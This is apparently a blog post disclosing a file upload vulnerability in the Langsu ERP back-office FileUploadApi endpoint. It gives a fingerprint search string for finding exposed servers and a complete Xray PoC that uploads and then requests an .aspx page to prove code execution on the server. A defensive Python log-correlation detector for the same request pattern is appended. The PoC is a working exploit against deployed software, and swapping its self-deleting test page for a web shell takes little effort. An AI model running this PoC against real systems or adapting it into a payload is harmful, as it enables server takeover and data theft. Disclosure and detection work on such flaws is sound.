File upload vulnerability in FileUploadApi of the Langsu ERP back-office management system

Reference for vulnerability details: https://mp.weixin.qq.com/s/nMRnxBicTEiKJtfT0R3wQA

 

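Vulnerability overview:

Langsu ERP is a powerful enterprise resource planning (ERP) package built for small and medium-sized businesses, intended to help them streamline management processes and improve operational efficiency. It is used not only in manufacturing but also widely in retail, logistics, services and other industries. The FileUploadApi interface file in the Langsu ERP back-office management system has a file upload vulnerability. An attacker can exploit it to upload malicious files and then take control of the server or steal sensitive corporate information.

Asset fingerprint: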

  body="/Resource/Scripts/Yw/Yw_Bootstrap.js"

Xray PoC:

name: poc-yaml-lum-soft-fileuploadapi-fileupload
manual: true
set:
  randint: randomInt(1000000, 9999999)
  rboundary: randomLowercase(16)
  randname: randomLowercase(6)
transport: http
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /Api/FileUploadApi.ashx?method=DoWebUpload
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\";filename=\"{{randname}}.aspx\"\r\n\r\n<%@ Page Language=\"C#\"%><% Response.Write(\"{{randint}}\");System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>\r\n------WebKitFormBoundary{{rboundary}}--"
    expression: response.status == 200 && response.body_string.contains("WebRelPath")
    output:
      search: '"WebRelPath\":\"(?P<uploadfile>.+?).aspx\",".bsubmatch(response.body)'
      uploadfile: search["uploadfile"]
  r1:
    request:
      cache: true
      method: GET
      path: /{{uploadfile}}.aspx
    expression: response.status == 200 && response.body_string.contains(string(randint))
expression: r0() && r1()
detail:
  author: cysec
  links:
    - https://mp.weixin.qq.com/s/nMRnxBicTEiKJtfT0R3wQA
  description: 朗速ERP后台管理系统FileUploadApi存在文件上传漏洞
  fofakeyword: body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
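
A defender-side check for the request pattern the PoC above relies on (a successful POST to /Api/FileUploadApi.ashx?method=DoWebUpload followed by a GET for a previously unseen .aspx page from the same client), as an added example that is not part of the original post. It assumes IIS W3C logs with a #Fields: header; the log lines, the /Upload/... path, the function name and the five-minute window are constructed for illustration.

```python
from datetime import datetime, timedelta

UPLOAD_STEM = "/api/fileuploadapi.ashx"   # endpoint used by the PoC (lower-cased)
UPLOAD_QUERY = "method=dowebupload"
WINDOW = timedelta(minutes=5)             # assumed correlation window

# Constructed sample IIS W3C log lines (not from a real system).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-02-11 08:00:01 GET /Login.aspx - 198.51.100.7 200
2025-02-11 08:14:30 POST /Api/FileUploadApi.ashx method=DoWebUpload 203.0.113.9 200
2025-02-11 08:14:31 GET /Upload/2025/qwerty.aspx - 203.0.113.9 200
2025-02-11 08:15:00 GET /Login.aspx - 203.0.113.9 200
2025-02-11 09:00:00 POST /Api/FileUploadApi.ashx method=DoWebUpload 198.51.100.7 401
"""

def find_upload_then_execute(log_text, window=WINDOW):
    """Flag clients that upload via FileUploadApi and then fetch a new .aspx page."""
    fields, seen_aspx, uploads, findings = [], set(), {}, []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows below
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        ts = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        stem, ip, ok = row["cs-uri-stem"].lower(), row["c-ip"], row["sc-status"] == "200"
        if (row["cs-method"] == "POST" and stem == UPLOAD_STEM
                and UPLOAD_QUERY in row["cs-uri-query"].lower() and ok):
            uploads[ip] = ts                   # remember the latest successful upload
        elif row["cs-method"] == "GET" and stem.endswith(".aspx"):
            up = uploads.get(ip)
            # Suspicious: page never requested before, fetched soon after an upload.
            if up and ok and ts - up <= window and stem not in seen_aspx:
                findings.append({"client": ip, "upload_time": up,
                                 "hit_time": ts, "page": row["cs-uri-stem"]})
            seen_aspx.add(stem)
    return findings

if __name__ == "__main__":
    for f in find_upload_then_execute(SAMPLE_LOG):
        print(f"{f['client']} uploaded at {f['upload_time']} then requested {f['page']}")
```

The PoC's test page deletes itself after it runs, so a file-system sweep can miss it while the two log entries remain.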

 

 

 

posted @ 2025-02-11 16:36  Cysec